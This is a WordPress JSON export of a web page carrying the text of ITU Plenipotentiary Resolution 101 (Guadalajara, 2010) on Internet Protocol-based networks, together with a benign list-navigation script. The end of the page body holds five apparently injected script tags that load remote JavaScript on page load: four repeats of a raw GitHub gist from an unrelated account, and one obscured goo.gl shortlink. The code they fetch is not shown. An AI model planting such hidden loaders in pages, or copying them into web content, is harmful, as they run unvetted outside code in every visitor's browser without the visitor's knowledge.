{"id":435,"date":"2013-05-18T21:39:16","date_gmt":"2013-05-19T01:39:16","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=435"},"modified":"2015-06-29T23:43:40","modified_gmt":"2015-06-30T03:43:40","slug":"pp_101","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/plenipotentiary\/pp-2010\/pp_101\/","title":{"rendered":"PP Resolution 101"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span style=\"\">PP RESOLUTION  101  (Rev. Guadalajara, 2010)<\/span><\/h3>\n<h4><span style=\"\">Internet Protocol-based networks<\/span><\/h4>\n<p><span style=\"\">The Plenipotentiary Conference of the International Telecommunication Union (Guadalajara, 2010),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" style=\"\"><span style=\"\">recalling<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a) Resolution 101 (Rev. Antalya, 2006) of the Plenipotentiary Conference;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b) the outcomes of the Geneva (2003) and Tunis (2005) phases of the World Summit on the Information Society (WSIS), especially \u00a7\u00a7 27 c) and 50 d) of the Tunis Agenda for the Information Society, relating to international Internet connectivity;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c) No. 196 of the ITU Convention, which stipulates that telecommunication standardization study groups shall pay due attention to the study of Questions and to the formulation of recommendations directly connected with the establishment, development and improvement of telecommunications in developing countries at both the regional and international levels;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)  Resolution 23 (Rev. Hyderabad, 2010) of the World Telecommunication Development Conference (WTDC), on  Internet access and availability for developing countries  and charging principles for international Internet connection;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e) Resolution 69 (Johannesburg, 2008) of the World Telecommunication Standardization Assembly (WTSA), on non-discriminatory access and use of Internet resources;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f) Recommendation ITU-T D.50, on general tariff principles &#8211; principles applicable to international Internet connection;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g) Resolution 64 (Johannesburg 2008) of WTSA, on IP address allocation and encouraging the deployment of IPv6,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">aware<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a) that one of the purposes of the Union is to promote the extension of new telecommunication technologies to all the world&#8217;s inhabitants;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b) that, in order to fulfil its purposes, the Union should, among other things, facilitate the worldwide standardization of telecommunications, with a satisfactory quality of service,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a) that advances in the global information infrastructure, including the development of Internet Protocol (IP)-based networks and especially the Internet, and future IP developments, continue to be an issue of crucial importance, as an important engine for growth in the world economy in the twenty-first century;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b) that the increased use of the Internet introduces new additional applications in telecommunication\/information and communication technology (ICT) services based on its highly advanced technology, e.g. the utilization of e-mail and text messaging, voice over IP, video, and real-time TV (IPTV) over the Internet, which has become commonplace, even though there are challenges regarding quality of service, uncertainty of origin, and the high cost of international connectivity;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c) that current and future IP-based networks and future IP developments will continue to introduce dramatic changes in the way we acquire, produce, circulate and consume information,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering further<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a) that the ITU Telecommunication Development Sector (ITU-D) has made significant progress and carried out several studies on the promotion of infrastructure and the use of the Internet in developing countries under its 2002 Istanbul Action Plan, through human capacity building efforts such as its Internet training centre initiative, and through the outcomes of WTDC-06, which endorsed the continuation of these studies, and called on ITU-D to give assistance to developing countries, including least developed countries, small island developing states and landlocked developing countries, to set up high-speed backbone networks for the Internet, as well as national, subregional and regional access points for the Internet;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b) that studies are ongoing in the ITU Telecommunication Standardization Sector (ITU-T) on IPbased network issues, including service interoperability with other telecommunication networks, numbering, signalling requirements and protocol aspects, security and infrastructure component costs, issues associated with the evolution to next-generation networks (NGN), including the migration from existing networks to NGNs, and implementation of the requirements of Recommendation ITU-T D.50;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c) that the general cooperation agreement between ITU-T and the Internet Society (ISOC)\/Internet Engineering Task Force (IETF), as referred to in Supplement 3 to the ITU-T Series A recommendations, continues to exist,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"col\" style=\"\"><span style=\"\">a) that IP-based networks have evolved to a widely accessible medium used for global commerce and communication, and there is therefore a need to identify the global activities related to   IP-based networks with respect to, for example:<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\" style=\"\"><span style=\"\">i) infrastructure, interoperability and standardization;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">ii) Internet naming and addressing;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">iii) dissemination of information about IP-based networks and the implications of their development for ITU Member States, particularly the developing countries;<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b) that significant work on IP-related issues and the future internet 1 is being conducted within ITU and many other international bodies;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c) that the quality of service of IP-based networks should be consistent with ITU-T recommendations and other recognized international standards;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d) that it is in the public interest that IP-based networks and other telecommunication networks should be both interoperable and provide, at a minimum, the level of quality of service provided by traditional networks, consistent with ITU-T recommendations and other recognized international standards,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">requests the ITU Telecommunication Standardization Sector<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to continue its collaborative activities on IP-based networks with ISOC\/IETF and other relevant recognized organizations, in respect of interconnectivity with existing telecommunication networks and migration to NGN and future networks,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">requests the three Sectors<\/span>\n<ul class=\"sub\">\n<li class=\"exp\" style=\"\"><span style=\"\">to continue to consider their future work programmes on IP-based 1 networks and on migration to NGN and future networks,<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1 e.g. ITU-T Kaleidoscope event on Beyond the Internet? &#8722; Innovations for future networks and services,held in Pune, India in December 2010<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">resolves<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1 to explore ways and means for greater collaboration and coordination between ITU and relevant organizations 2 involved in the development of IP-based networks and the future internet, through cooperation agreements, as appropriate, in order to increase the role of ITU in Internet governance so as to ensure maximum benefits to the global community;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2 that ITU shall fully embrace the opportunities for telecommunication\/ICT development that arise from the growth of IP-based services, in conformity with the ITU purposes and the outcomes of the Geneva (2003) and Tunis (2005) phases of WSIS, taking into account the quality and security of services;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3 that ITU shall clearly identify, for its Member States and Sector Members and for the general public, the range of Internet-related issues that fall within the responsibilities incumbent on the Union under its basic texts and the activities in the WSIS outcome documents where ITU has a role;<\/span><\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">4 that ITU shall continue to collaborate with other relevant organizations to ensure that growth in IP-based networks, along with and taking into consideration traditional networks, delivers maximum benefits to the global community, and shall continue to participate, as appropriate, in any directly related new international initiatives, particularly the recent initiative in cooperation with the United Nations Educational, Scientific and 2 Cultural Organization (UNESCO) on the United Nations Broadband Commission formed for this purpose;<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">2 Including, but not limited to, the Internet Corporation for Assigned Names and Numbers (ICANN), the regional Internet registries (RIRs), the Internet Engineering Task Force (IETF), the Internet Society (ISOC) and the World Wide Web Consortium (W3C), on the basis of reciprocity.<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5 to continue the study of international Internet connectivity as an urgent matter, as called for in \u00a7 50 d) of the Tunis Agenda ,and to call upon ITUT, in particular Study Group 3 which has responsibility for Recommendation ITU-T D.50, to complete as soon as possible its studies that have been ongoing since WTSA-2000,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Secretary-General<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1 to prepare an annual report to the ITU Council with the appropriate input from Member States, Sector Members, the three Sectors and the General Secretariat, that provides a comprehensive summary both of the activities that ITU is already undertaking in regard to IP-based networks and any changes thereto, including the development of NGNs and future networks, and of the roles and activities of other relevant international organizations, describing their involvement in IP-based network issues; the report shall indicate the degree of cooperation between ITU and these organizations, drawing the required information wherever possible from existing sources, and containing concrete proposals on improving ITU activities and such cooperation, and shall be distributed widely among the Member States and Sector Members, the advisory groups of the three Sectors and other groups involved one month before the Council session;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2 based on this report, to continue collaborative activities related to IP-based networks, especially those related to the implementation of the relevant outcomes of the two phases of WSIS;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3 to propose to the 2011 session of the Council that a special forum under Resolution 2 (Rev.  Guadalajara, 2010) of this conference or workshop be convened in the first quarter of 2013 to discuss all the issues raised in this resolution and also in Resolutions 102 and 133 (Rev. Guadalajara, 2010) of this conference, preferably collocated with other relevant major ITU events,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites the Council<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to consider the above-mentioned report and take into account comments, if any, made by the advisory groups of the three Sectors through their respective Bureau Directors on implementation of this resolution and, when appropriate, undertake further steps, and to study the Secretary-General&#8217;s proposal calling for a forum under Resolution 2 (Rev. Guadalajara, 2010) or workshop to address all issues related to this resolution and to Resolutions 102 and 133 (Rev. Guadalajara, 2010) of this conference,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites Member States and Sector Members<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1 to participate in, and follow the progress of, the current work of the Sectors of the Union;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2 to increase awareness at national, regional and international level among all interested non-governmental parties and to encourage their participation in relevant ITU activities, and in any other relevant activities emanating from the Geneva (2003) and Tunis (2005) phases of WSIS<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>PP RESOLUTION 101 (Rev. Guadalajara, 2010) Internet Protocol-based networks The Plenipotentiary Conference of the International Telecommunication Union (Guadalajara, 2010), recalling a) Resolution 101 (Rev. Antalya, 2006) of the Plenipotentiary Conference; b) the outcomes of the Geneva (2003) and Tunis (2005) phases of the World Summit on the Information Society (WSIS), especially \u00a7\u00a7 27 c) and [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1427,"menu_order":101,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-435","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/435","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=435"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/435\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1427"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=435"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}